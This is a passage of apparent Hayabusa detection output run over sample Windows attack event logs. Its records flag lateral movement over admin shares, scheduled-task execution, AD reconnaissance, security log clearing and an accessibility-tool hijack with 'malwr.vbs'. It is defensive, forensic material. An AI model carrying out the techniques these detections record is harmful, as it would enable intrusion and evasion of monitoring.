Windows\Temp\ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55585 : LogonID: 
0x10fac2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49244 : LogonID: 0x10fbcc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fbeb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fc09,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.692 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x110085,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:43.570 
+09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55872 : LogonID: 0x15e162,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49222 : LogonID: 0x15e1a7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: user01 : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance 
Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55873 : LogonID: 0x15e25f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: WIN-77LTAPHIQ1R$ : Share Name: \\*\SYSVOL : Share Path: \??\C:\Windows\SYSVOL\sysvol : IP Address: fe80::79bf:8ee2:433c:2567,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance 
Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.179 
+09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: NULL : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e29a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49237 : LogonID: 
0x17e2c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2d2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.319 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:2 TaskName:\\CYAlyNSS timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- +2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx +2019-03-19 09:02:04.351 
+09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP 
Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.508 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.523 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : 
IP Address: fe80::79bf:8ee2:433c:2567 : Port: 56034 : LogonID: 0x18423d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: 
C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:36:03.788 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe C:\Windows\system32\CompatTelRunner.exe : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
\SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 
ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: 
